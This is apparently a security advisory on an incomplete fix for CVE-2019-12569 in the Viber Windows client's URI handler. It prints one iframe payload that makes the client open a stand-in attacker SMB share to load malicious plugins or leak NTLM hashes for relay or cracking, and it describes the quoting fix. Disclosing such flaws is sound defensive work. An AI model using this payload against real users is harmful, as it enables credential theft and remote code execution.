Product: Viber Windows Desktop Application
Developer: Rakuten Viber (part of Rakuten Inc.)
Vulnerability: Unquoted URI handler
Affected Versions: All versions up to 13.2.0.39

The fix for CVE-2019-12569 was incomplete. Before the fix for CVE-2019-12569
an attacker could embed a malicious iframe in a website with a crafted
URL (<iframe src='viber: --platformpluginpath \\attacker-IP\share'>)
that would launch the Viber Windows desktop client with a malicious
platformpluginpath, a Qt5 framework built-in parameter. The
platformpluginpath parameter specifies a plugin path from which
Viber (built on Qt5) would load plugins (special DLLs). An attacker
could specify a remote SMB share to load malicious plugins from and
achieve remote code execution. After fixing CVE-2019-12569, the client
would no longer load Qt5 plugins from the remote SMB share; however,
the remote SMB share was still opened. Windows will perform NTLM
authentication when opening the SMB share and that request can be
relayed (using a tool like responder) for code execution (or captured
for hash cracking). This issue was remediated by quoting the 
parameters passed by the viber URI handler -- URL:Viber Link
C:\Users\jeffssh\AppData\Local\Viber\Viber.exe "%1".

References: 
https://www.zerodayinitiative.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739
https://www.helpnetsecurity.com/2019/06/11/microsoft-ntlm-vulnerabilities/#:~:text=NTLM%20Relay%20is%20one%20of,directed%20at%20the%20compromised%20server.